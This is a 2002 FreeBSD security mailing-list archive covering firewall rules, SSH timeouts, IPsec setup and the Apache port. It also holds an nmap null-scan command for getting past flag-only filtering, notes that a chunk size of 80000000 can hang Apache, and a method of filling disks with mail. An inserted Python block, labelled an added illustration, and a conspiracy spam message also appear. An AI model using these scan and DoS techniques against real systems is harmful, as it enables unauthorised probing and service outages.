> ipfw add 10 allow tcp from any to 10.0.0.2 80 setup
> (DEFAULT DENY RULE)
>
> vs.
>
> block in all
> block out all
> pass in quick on fxp0 proto tcp from any to 10.0.0.2 port = 80 flags S keep state
>
> These two rule snippets do essentially the same thing, I know one of them is
> stateful, and the other is not.
> It is kind of like comparing apples to oranges... but they behave the same in
> the end. They both check for a SYN, and keep a (virtual) state.

Not quite. A more interesting example above would be if the ipf snippet did
"block return-rst in proto tcp all". Then you would see a big difference in
the behavior of scanners, particularly those doing a non-SYN scan. They
would get RSTs on every single port with the ipf code, while the ipfw code
would let every scanned packet and response through. (This, of course, is
not to say that you can't get ipfw to return RSTs on all those ports in a
similar situation, but you certainly don't do it with "setup" and
"established".)

The "established" and "setup" keywords essentially mean anything with RST
or ACK, and anything with SYN but not ACK, respectively. One could quite
easily scan through a firewall set up this way by sending packets that look
like they are part of an established session. With these ipfw keywords
there is *absolutely no state keeping of any sort*. There are ways to keep
state with ipfw; inquire in your local manpages.

It's also worth noting that you may want something different than "flags S"
there in your ipf thingy... check the ipf-howto for reasons why.

> I have heard from the IPF community that a "allow tcp from any to any
> established" can be spoofed. Don't they need the right sequence number to do
> that? I mean, to send packets to my machine "claiming" to already
> be established to a private port?

No, as I briefly explained above. "established" and "setup" do no state
keeping whatsoever. They simply look at the TCP flags, which can be set any
which way by a malicious transmitter. They don't care what the sequence
number is at all.
As long as they have RST or ACK set, they get through. Think of those
keywords as shorthand for "tcpflags ack" (or rst) and "tcpflags syn,!ack".

> If so, then why is the /etc/rc.firewall
> script written this way? There must be a reason. Also, which one is faster
> at matching packets on average?

It depends heavily on the ruleset, I imagine. Search the list archives for
various discussions/flamefests about which is better.

-- 
William Carrel | Sr. Systems Engineer | william.carrel@infospace.com
InfoSpace INC 601 108th Ave NE | Suite 1200 | Bellevue, WA 98004

From owner-freebsd-security Thu Jun 20 17:42:16 2002
Date: Fri, 21 Jun 2002 02:41:37 +0200
From: "todschick38259@hotmail.com"
Reply-To: "todschick38259@hotmail.com"
Subject: Please excuse the disturbance! (Entschuldigen Sie bitte die Störung!)
Message-Id: <20020621004107.7137E37B404@hub.freebsd.org>

Please excuse the disturbance!

Something has come to my ears. A rather unusual rumour mill, from which I
was served a hard-to-digest soup, is the reason for my mail. "Unappetizing"
does not begin to describe it! Is it possible to influence or manipulate
someone by radio (in which frequency ranges?), or even to harass and
terrorize them? Under the motto: "Someone on the transmitter? Not entirely
alone? A little man in the ear? Wrong wavelength? Beans in the ears? Probing
the teeth (amalgam)? A casual listen-in? The Pullach bug dance?" Is that
crazy talk? That is not possible at all, is it? And if it is, how does it
look ethically and morally?

On the technical side of the matter there are reports and web pages:

Totalitaer,de - Die Waffe gegen die Kritik
http://www.fosar-bludorf.com/Tempelhof/
http://jya.com/haarp.htm
http://www.zeitenschrift.at/magazin/zs_24_15/1_mikrowaffen.htm
http://www.bse-plus.de/d/doc/lbrief/lbmincontr.htm
http://home.nexgo.de/kraven/bigb/big3.html
http://w3.nrl.navy.mil/projects/haarp/index.html
http://cryptome.org/
http://www.parascope.com/ds/mkultra0.htm
http://www.trufax.org/menu/mind.html
http://www.trufax.org/menu/elect.html
http://mindcontrolforum.com/
and so on, and so on, and so on,

but it cannot be that something like this is done, can it? A human rights
violation without equal!?! Is it possible by preparing the ears, in
combination with any dentures that may be present? With relatively simple
radio technology?? In this country? Here and today??? With what motives?
Where, actually, is Department 5 of the BND and of the Verfassungsschutz?
Can it be that there are people who permanently deliver a situation report
to the BND/Verfassungsschutz by radio without noticing it themselves, made
feasible in childhood?? Is information about, purely theoretically, every
German citizen collected by such unofficial collaborators of the BND and
Verfassungsschutz, in the manner of the Stasi? Is there then still a right
to privacy? Who actually checks the BND, MAD and Verfassungsschutz for
infiltration???

What my mail is actually about is the question whether it is possible for
criminal elements, motivated by enrichment, or for groups with ideological
motives, to acquire knowledge and technology that was developed at other
times and for other motives (Western television?). And is the technical
state of knowledge known to the general public really the end of the line?
Is it not equally possible for criminal elements, to put it in a harmless
and diminutive way, to spy on individual persons or groups with relatively
simple means, for whatever motives? And does this "spying" not represent a
considerable intrusion into privacy? Assuming, for the moment, acceptance
by a certain (suggested?) public, which could be created, for example, with
the help of web sites such as the "Pranger" (pillory), is it possible to
terrorize and/or harass individual persons or groups, and to do so in full
(suggested) public view? Do the people who are disparaged or even slandered
there at the Pranger, or on any other site, actually have any chance of a
counter-publicity? Is that not character assassination? Some years ago I
stumbled by chance on the site "Der Pranger"; at that time it did not yet
run under the cover of a dating service. Can individual persons or interest
groups, purely for their own ends, use such sites to push through their
own, quite personal interests under the cover of a questionable civil
courage, by instigating some smear campaign? Can such sites serve to
coordinate criminal machinations?

The question is whether it is possible or impossible, technically and
socially, to manipulate or influence, terrorize or harass individual
persons or groups, in a targeted way, out of a criminal/ideological energy.
Target-group manipulation through mass media is everyday manipulation that
one can, more or less, escape. Is the right to privacy being undermined,
creepingly and depth-psychologically, by programmes such as, for example,
"Big Brother"?

Should one of those I have mailed have some knowledge of the topic, I would
be glad of pointers on it. In search of answers to my questions I am
mailing various addresses from the Internet and hope for constructive
answers and criticism. I would be pleased by a visit to the page
http://hometown.aol.de/reinerhohn38259/homepage/index.html. Should you have
been written to by me more than once, I ask you to excuse this; it was not
intended. The reason for my anonymity is the fact that with this kind of
questioning, understandably, the call for psychiatry is quickly raised.
Which also has (is) method. Should you perceive this mail as harassment, I
would like to apologize for it herewith!

Big brother is watching you?

Could someone help me with the correct translation?
From owner-freebsd-security Thu Jun 20 18:04:56 2002
Date: Fri, 21 Jun 2002 03:05:25 +0200
From: Roelof Osinga
Organization: eBOA - Programming the Web
To: Dag-Erling Smorgrav
Cc: Michael Sierchio, Eric F Crist, 'Ryan Thompson', freebsd-security@FreeBSD.ORG
Subject: Re: Password security
Message-ID: <3D127BD5.8000406@eboa.com>
References: <000c01c2174c$5a38f230$77fe180c@armageddon> <3D109329.8050007@tenebras.com>

Dag-Erling Smorgrav wrote:
> Michael Sierchio writes:
>
>> Dag-Erling Smorgrav wrote:
>>
>>> 1) Biometrics can't be used reliably for remote access.
>>
> Most fingerprint scanners don't even encrypt the data they send to the
> computer they're connected to.

Yeah. Unlike keyboards that habitually encrypt all data entered or keys
stroked before they send it to the computer they're connected to.

> ...
> The only biometric authentication system I trust (to some degree,
> anyway) is the human brain.

Whoa boy. Are you in trouble or what!

Look at it this way. This could have been a really nice planet. If it
weren't for all those inflated apes or homo emotici running around on it.

I like biometrics. For one thing, you can't forget them easily. But you
need to combine them with another gimmick like a password. Not another
biometric, mind.

Roelof
-- 
_______________________________________________________________________
eBOA® est. 1982 http://eBOA.com/ tel. +31-58-2123014
mailto:info@eBOA.com?subject=Information_request fax. +31-58-2160293

From owner-freebsd-security Thu Jun 20 18:23:05 2002
Date: Fri, 21 Jun 2002 03:23:51 +0200
From: Roelof Osinga
Organization: eBOA - Programming the Web
To: Eric F Crist
Cc: 'twig les', 'graham', freebsd-security@FreeBSD.ORG
Subject: Re: Password security (my final post on this particular thread)
Message-ID: <3D128027.3090509@eboa.com>
References: <004101c217bf$74a26f70$77fe180c@armageddon>

Eric F Crist wrote:
> It's apparent that this conversation could go on forever. It is also
> ...
>
> 1) Password security is not perfect due to the inability of most
> people/users of data networks to remember and conjure up difficult,
> complex, or hard to guess passwords.
>
> 2) Biometrics is not a foolproof method of authentication and there are
> ways to trick these devices.
>
> 3) The generally agreed upon method for the most secure method of
> authentication over a seemingly insecure data network would be to
> combine a multitude of different technology, all dependent on each
> other.

You missed the simple fact that all keys can be copied. From an OPIE list
or print to some generated cryptographic bit sequence. Making it very
simple - given that opportunity - to raise a hell of a lot of false
positives. Thus making 3 4.

Furthermore, I think you should amend 3 or 4 by adding time into the
equation. Just varying parts of the defense in a timely manner makes it
harder for wannabes to get the toehold needed to do their dirty deeds.

Roelof

PS: true, biometric keys can also be copied easily
-- 
_______________________________________________________________________
eBOA® est. 1982 http://eBOA.com/ tel. +31-58-2123014
mailto:info@eBOA.com?subject=Information_request fax. +31-58-2160293

From owner-freebsd-security Thu Jun 20 18:31:06 2002
Date: Thu, 20 Jun 2002 18:31:10 -0700
From: Lawrence Sica
To: twig les
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SSH timeout settings
Message-ID: <3D1281DE.5000804@earthlink.net>
References: <20020620214512.42806.qmail@web10101.mail.yahoo.com>

twig les wrote:
> Hey all, I think this is an easy one masquerading as a
> tough one.... My OpenSSH on my Free 4.4 Release box
> just lets me keep an open session indefinitely without
> any activity. I've read man sshd and all sorts of
> other things but no mention.
>
> So the short version is: where do I lower the timeout
> of SSH?

If you are using login with ssh, then you can modify login.conf; from
man 5 login.conf:

    idletime    time    Maximum idle time before logout.

Read the manpage for more info and don't forget to run cap_mkdb if you
change login.conf.

Within sshd itself, you need to add this to /etc/ssh/sshd_config:

    ClientAliveInterval n

where n is the number of seconds. 0 (default) is unlimited and implied.

I'd use the sshd_config option and not login, but I don't use login w/ ssh.

HTH
--Larry

From owner-freebsd-security Thu Jun 20 20:07:03 2002
Date: Thu, 20 Jun 2002 22:01:46 -0500
From: "Robert Herrold"
Subject: Re: Apache 1.3.26 port
Message-ID: <005501c218d0$0d209ae0$6c01a8c0@metropark.metropark.com>
References: <200206201111.g5KBBq8t064689@aristotle.tamu.edu>
I'm still trying to locate this port. Can't seem to get it with cvsup. Is
there a 1.3.26+modssl port yet?

----- Original Message -----
From: "Robin Smith"
Sent: Thursday, June 20, 2002 6:11 AM
Subject: Re: Apache 1.3.26 port

> Worth adding that the apache port will also overwrite cgi-bin.default;
> if you have /cgi-bin symlinked to that, you are also hosed.
>
> Though it's easy enough to notice this, I too don't see why this
> particular gotcha needs to be in the port. Why not just let the
> port create empty data and cgi-bin directories rather than symlinks?
>
> This is really off-topic for freebsd-security, but those of you who've
> lost web site content might want to look again.
>
> Robin Smith

From owner-freebsd-security Thu Jun 20 22:35:37 2002
Date: Fri, 21 Jun 2002 17:35:21 +1200 (NZST)
From: Andrew McNaughton
To: "Dalin S. Owen"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/IPF Setup/Established
In-Reply-To: <20020620171111.A24480@nexusxi.com>
Message-ID: <20020621171329.C32663-100000@a2>

On Thu, 20 Jun 2002, Dalin S. Owen wrote:

> I have heard from the IPF community that a "allow tcp from any to any
> established" can be spoofed. Don't they need the right sequence number
> to do that? I mean, to send packets to my machine "claiming" to already
> be established to a private port? If so, then why is the
> /etc/rc.firewall script written this way? There must be a reason.
> Also, which one is faster at matching packets on average?

You can't initiate a new TCP session if the SYN packet is blocked. I'd
guess that the point of said spoofing would be for port scanning. E.g.,
this rule:

    ipfw deny tcp from any to any in via ep0 setup

does not prevent TCP port scanning, e.g.:

    nmap -P0 -sN

Andrew

From owner-freebsd-security Thu Jun 20 23:28:19 2002
Date: Tue, 18 Jun 2002 13:05:47 -0700
From: "Crist J. Clark"
To: security@freebsd.org
Subject: Configuring sainfo in racoon(8)
Message-ID: <20020618130547.A11688@blossom.cjclark.org>
Reply-To: cjclark@alum.mit.edu
X-URL: http://people.freebsd.org/~cjc/

I am trying to get some ESP tunnels going. I am using racoon(8) to handle
the IKE to negotiate the SAs. I am having a problem right from the start.
My racoon.conf(5) looks something like,

    remote 192.168.100.1 {
        ...
        my_identifier user_fqdn "cjc@mydomain.org";
        peer_identifier user_fqdn "cjc@mydomain.org";
        ...
    }

    sainfo user_fqdn "cjc@mydomain.org" user_fqdn "cjc@mydomain.org" {
        ...
    }

I have my SPD set,

    # setkey -c <

Date: 21 Jun 2002 09:39:00 +0200
From: Dag-Erling Smorgrav
To: Roelof Osinga
Cc: Michael Sierchio, Eric F Crist, 'Ryan Thompson', freebsd-security@FreeBSD.ORG
Subject: Re: Password security
In-Reply-To: <3D127BD5.8000406@eboa.com>
References: <000c01c2174c$5a38f230$77fe180c@armageddon> <3D109329.8050007@tenebras.com> <3D127BD5.8000406@eboa.com>
X-URL: http://www.ofug.org/~des/

Roelof Osinga writes:
> Dag-Erling Smorgrav wrote:
> > Most fingerprint scanners don't even encrypt the data they send to the
> > computer they're connected to.
> Yeah. Unlike keyboards that habitually encrypt all data entered or keys
> stroked before they send it to the computer they're connected to.

That doesn't matter when what you type is a one-time password. Your
biometric information, on the other hand, does not change a lot.
DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 1:15:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from ren.sasknow.com (ren.sasknow.com [207.195.92.131]) by hub.freebsd.org (Postfix) with ESMTP id 742FB37B405 for ; Fri, 21 Jun 2002 01:15:36 -0700 (PDT) Received: from localhost (ryan@localhost) by ren.sasknow.com (8.11.6/8.11.6) with ESMTP id g5L8FUf55158 for ; Fri, 21 Jun 2002 02:15:30 -0600 (CST) (envelope-from ryan@sasknow.com) Date: Fri, 21 Jun 2002 02:15:30 -0600 (CST) From: Ryan Thompson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port In-Reply-To: <005501c218d0$0d209ae0$6c01a8c0@metropark.metropark.com> Message-ID: <20020621021033.F54913-100000@ren.sasknow.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Robert Herrold wrote to freebsd-security@FreeBSD.ORG: > I'm still trying to locate this port. Can't seem to get it with > cvsup. Is there a 1.3.26+modssl port yet? Yes... In the usual /usr/ports/www/apache13-modssl/ directory. I cvsupped and built it earlier today without a hitch. Check your supfile. To confirm you've updated the port, grep VERSION_APACHE Makefile to confirm that it's updated to 1.3.26. - Ryan > ----- Original Message ----- > From: "Robin Smith" > To: > Sent: Thursday, June 20, 2002 6:11 AM > Subject: Re: Apache 1.3.26 port > > > > Worth adding that the apache port will also overwrite cgi-bin.default; > > if you have /cgi-bin symlinked to that, you are also hosed. > > > > Though it's easy enough to notice this, I too don't see why this > > particular gotcha needs to be in the port. 
Why not just let the > > port create empty data and cgi-bin directories rather than symlinks? > > > > This is really off-topic for freebsd-security, but those of you who've > > lost web site content might want to look again. > > > > Robin Smith > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901 1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-664-3630 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 5:48: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id F124137B406 for ; Fri, 21 Jun 2002 05:47:55 -0700 (PDT) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g5LCls104126; Fri, 21 Jun 2002 07:47:54 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g5LClsM29289; Fri, 21 Jun 2002 07:47:54 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g5LClpR29282; Fri, 21 Jun 2002 07:47:51 -0500 (CDT) Message-ID: <3D132077.4B8FBB3D@centtech.com> Date: Fri, 21 Jun 2002 07:47:51 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: cjclark@alum.mit.edu Cc: security@freebsd.org Subject: Re: Configuring sainfo in racoon(8) References: <20020618130547.A11688@blossom.cjclark.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by 
AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Well, I'm no expert on this, but the way I have my tunnels set up is something like this (this is a script on one side of the tunnel). VNNAME=tunnelname GWAY=192.168.10.17 NMASK=255.255.255.240 HNET=192.168.10.16/28 IFACE=gif0 # DO NOT EDIT BELOW THIS POINT # EXTIP=`cat /usr/local/etc/vpn/$VNNAME-extip` gifconfig $IFACE delete gifconfig $IFACE 200.200.200.200 $EXTIP logger -t $VNNAME Interface $IFACE has been brought up. ifconfig $IFACE inet 10.10.10.39 $GWAY netmask 255.255.255.255 logger -t $VNNAME Configured $IFACE. route add -net $HNET $GWAY > /dev/null 2>&1 route add $HNET $GWAY > /dev/null 2>&1 route add 10.10.10.39 $GWAY > /dev/null 2>&1 logger -t $VNNAME Added network route for $IFACE setkey -c << EOF spddelete 10.10.10.0/24 $HNET any -P out; spddelete $HNET 10.10.10.0/24 any -P in; spddelete 10.20.0.0/16 $HNET any -P out; spddelete $HNET 10.20.0.0/16 any -P in; spdadd 10.10.10.0/24 $HNET any -P out ipsec esp/tunnel/200.200.200.200-$EXTIP/require; spdadd $HNET 10.10.10.0/24 any -P in ipsec esp/tunnel/$EXTIP-200.200.200.200/require; spdadd 10.20.0.0/16 $HNET any -P out ipsec esp/tunnel/200.200.200.200-$EXTIP/require; spdadd $HNET 10.20.0.0/16 any -P in ipsec esp/tunnel/$EXTIP-200.200.200.200/require; EOF ping -c 5 $GWAY > /dev/null 2>&1 logger -t $VNNAME Finished adding SPDs. Does this help any? Eric "Crist J. Clark" wrote: > I have my SPD set, > > # setkey -c < spdadd 192.168.200.1 192.168.101.0/24 any > -P out ipsec esp/tunnel/192.168.200.1-192.168.100.1/require; > spdadd 192.168.101.0/24 192.168.200.1 any > -P in ipsec esp/tunnel/192.168.100.1-192.168.200.1/require; > EOF -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology He who laughs last didn't get the joke. 
------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 8:52:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from sccrmhc03.attbi.com (sccrmhc03.attbi.com [204.127.202.63]) by hub.freebsd.org (Postfix) with ESMTP id 45C1B37B405 for ; Fri, 21 Jun 2002 08:52:12 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by sccrmhc03.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020621155211.FCC20219.sccrmhc03.attbi.com@blossom.cjclark.org>; Fri, 21 Jun 2002 15:52:11 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g5LFq6JK031126; Fri, 21 Jun 2002 08:52:06 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g5LFq68x031125; Fri, 21 Jun 2002 08:52:06 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Fri, 21 Jun 2002 08:52:05 -0700 From: "Crist J. 
Clark" To: Eric Anderson Cc: security@freebsd.org Subject: Re: Configuring sainfo in racoon(8) Message-ID: <20020621085205.A31083@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <20020618130547.A11688@blossom.cjclark.org> <3D132077.4B8FBB3D@centtech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3D132077.4B8FBB3D@centtech.com>; from anderson@centtech.com on Fri, Jun 21, 2002 at 07:47:51AM -0500 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 21, 2002 at 07:47:51AM -0500, Eric Anderson wrote: > Well, I'm no expert on this, but the way I have my tunnels set up is something > like this (this is a script on one side of the tunnel). [snip script] > Does this help any? Thanks, but not really. I'm not using gif(4) interfaces, and my SPD seems to be set up fine. It's the way racoon(8) is [not] working that is confusing me. > "Crist J. Clark" wrote: > > I have my SPD set, > > > > # setkey -c < > spdadd 192.168.200.1 192.168.101.0/24 any > > -P out ipsec esp/tunnel/192.168.200.1-192.168.100.1/require; > > spdadd 192.168.101.0/24 192.168.200.1 any > > -P in ipsec esp/tunnel/192.168.100.1-192.168.200.1/require; > > EOF -- Crist J. 
Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 10:23:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from m-net.arbornet.org (m-net.arbornet.org [209.142.209.161]) by hub.freebsd.org (Postfix) with ESMTP id DD50D37B400 for ; Fri, 21 Jun 2002 10:23:07 -0700 (PDT) Received: from m-net.arbornet.org (localhost [127.0.0.1]) by m-net.arbornet.org (8.12.3/8.11.2) with ESMTP id g5LHN4u7076972; Fri, 21 Jun 2002 13:23:04 -0400 (EDT) (envelope-from polytarp@m-net.arbornet.org) Received: from localhost (polytarp@localhost) by m-net.arbornet.org (8.12.3/8.12.3/Submit) with ESMTP id g5LHN4EL076969; Fri, 21 Jun 2002 13:23:04 -0400 (EDT) Date: Fri, 21 Jun 2002 13:23:04 -0400 (EDT) From: pgreen To: cjclark@alum.mit.edu Cc: Eric Anderson , Subject: Re: Configuring sainfo in racoon(8) In-Reply-To: <20020621085205.A31083@blossom.cjclark.org> Message-ID: <20020621132221.H76942-100000@m-net.arbornet.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org It's Christ! 
h ail m a ry praise the lord To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 11:25:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from thor.birkenwald.de (thor.birkenwald.de [195.143.230.218]) by hub.freebsd.org (Postfix) with ESMTP id 873E437B401 for ; Fri, 21 Jun 2002 11:25:34 -0700 (PDT) Received: by thor.birkenwald.de (Postfix, from userid 1000) id 8B6261ABF4; Fri, 21 Jun 2002 20:25:32 +0200 (CEST) Date: Fri, 21 Jun 2002 20:25:32 +0200 From: Bernhard Schmidt To: Maxim Kozin Cc: freebsd-security@freebsd.org Subject: Re: Apache expoit? Message-ID: <20020621182532.GA50708@thor.birkenwald.de> References: <2147483647.1024500409@[192.168.4.154]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.99i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 20, 2002 at 02:44:35PM +0400, Maxim Kozin wrote: > "Exploit" from this letter tested on FreeBSD 4.6-RELEASE with different > version apache: > 1) 2.0.36 > 2) 2.0.39 > 3) 1.3.26 > In case of 1) and (!) 2) httpd child died with "child out of swap > space". > So, in 2.0.39 still exists DoS. JFTR, same here on FreeBSD 4.5-RELEASE and 4.6-RELEASE with Apache 2.0.39 straight from /usr/ports/www/apache2. Anyone heard something from the apache.org people about this? 
-- bye bye Bernhard To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 11:57:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from musique.teaser.net (musique.teaser.net [213.91.2.11]) by hub.freebsd.org (Postfix) with ESMTP id C771637B40B for ; Fri, 21 Jun 2002 11:57:31 -0700 (PDT) Received: from roadrunner.rominet.net (ATuileries-109-1-2-231.abo.wanadoo.fr [80.13.122.231]) by musique.teaser.net (Postfix) with ESMTP id 8C94972524 for ; Fri, 21 Jun 2002 20:57:30 +0200 (CEST) Received: by roadrunner.rominet.net (Postfix, from userid 1000) id 932028162; Fri, 21 Jun 2002 20:57:29 +0200 (CEST) Date: Fri, 21 Jun 2002 20:57:29 +0200 From: Alain Thivillon To: freebsd-security@FreeBSD.ORG Subject: Re: Apache root exploitable? Message-ID: <20020621185729.GG9492@roadrunner.rominet.net> References: <20020620201509.GC56227@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.24i X-Organization: Rominet Networks Inc. X-Operating-System: FreeBSD 4.6-RC Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > It isn't a very serious DoS though. My first try on FreeBSD 4.x with chunk size = 80000000 put httpd child in an endless loop. 10 or 20 requests will probably result in an unusable system (loop continues after client connection is closed). -- Nom d'un chat de nom d'un chat ! 
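Alain's observation above (a declared chunk size of 80000000 hex wedging an httpd child) is the symptom of a chunked-body parser that trusts the client's declared length. The following is an added example, not code from the thread or from Apache: a bounded decoder for the HTTP/1.1 chunked transfer coding, beside a small model of the signed-integer mistake that is assumed here to be the bug class involved (the thread itself does not state the mechanism). MAX_CHUNK_BYTES and MAX_BODY_BYTES are constructed policy limits, and the sample body is constructed.

```python
"""Bounded decoder for HTTP/1.1 chunked transfer coding, with a model of the
signed-size mistake that makes a declared chunk size of 0x80000000 dangerous.
Added illustration; the limits below are constructed policy values."""
import re

# chunk-size line: 1+ hex digits, optional ";extension", then CRLF (RFC 2616 3.6.1)
CHUNK_SIZE_LINE = re.compile(rb"([0-9A-Fa-f]+)(?:;[^\r\n]*)?\r\n")

MAX_CHUNK_BYTES = 1 << 20   # assumption: largest single chunk we accept
MAX_BODY_BYTES = 8 << 20    # assumption: largest decoded body we accept
MAX_SIZE_DIGITS = 8         # 32 bits of size already exceeds both limits


def as_int32(value: int) -> int:
    """Interpret a non-negative integer the way a C 32-bit signed int holds it."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


def legacy_size_check_passes(size_hex: str, buf_len: int = 8192) -> bool:
    """Model of the bug class (an assumption, not Apache's actual code): the
    declared size is stored in a signed int and only checked as `size > buf_len`.
    0x80000000 wraps to -2147483648, slips past the check, and later reaches a
    copy routine as a huge unsigned length."""
    return as_int32(int(size_hex, 16)) <= buf_len


def decode_chunked(data: bytes) -> bytes:
    """Decode a chunked body; raise ValueError rather than trust a bad size."""
    out = bytearray()
    pos = 0
    while True:
        m = CHUNK_SIZE_LINE.match(data, pos)
        if m is None:
            raise ValueError(f"malformed chunk-size line at offset {pos}")
        digits = m.group(1)
        if len(digits) > MAX_SIZE_DIGITS:
            raise ValueError("chunk size has too many hex digits")
        size = int(digits, 16)            # Python ints never wrap negative
        if size > MAX_CHUNK_BYTES:
            raise ValueError(f"chunk size {size} exceeds MAX_CHUNK_BYTES")
        pos = m.end()
        if size == 0:
            return bytes(out)             # last-chunk; trailers not processed here
        if len(out) + size > MAX_BODY_BYTES:
            raise ValueError("decoded body exceeds MAX_BODY_BYTES")
        chunk = data[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk data")
        if data[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("missing CRLF after chunk data")
        out += chunk
        pos += size + 2


def rejects(data: bytes) -> bool:
    """True if the bounded decoder refuses this body."""
    try:
        decode_chunked(data)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    body = b"4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n"   # constructed sample body
    print(decode_chunked(body))                     # b'Wikipedia'
    print(legacy_size_check_passes("80000000"))     # True: the dangerous case
    print(rejects(b"80000000\r\n"))                 # True: bounded decoder refuses it
```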
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 17: 1:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 96B2237B405 for ; Fri, 21 Jun 2002 17:01:24 -0700 (PDT) Received: (from root@localhost) by lariat.org (8.9.3/8.9.3) id SAA26010 for security@freebsd.org; Fri, 21 Jun 2002 18:01:16 -0600 (MDT) Date: Fri, 21 Jun 2002 18:01:16 -0600 (MDT) From: Brett Glass Message-Id: <200206220001.SAA26010@lariat.org> To: security@freebsd.org Subject: Possible security liability: Filling disks with junk or spam Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Two years ago, at BSDCon, I reported on a form of abuse known as a "Rumplestiltskin attack," in which an attacker guessed names in rapid succession so as to find valid e-mail addresses to spam. Well, as it turns out, one doesn't need to do this to find addresses on FreeBSD systems that can be filled with mail. /etc/passwd contains quite a few pseudo-users which, if mailed, cause the mail to be stored on the disk as if it were addressed to a real user. No one may ever read it, but it's possible to fill the partition and thereby wreak havoc. A client recently called me in puzzlement, saying that his system was misbehaving, and it turned out that this was what had happened. The address 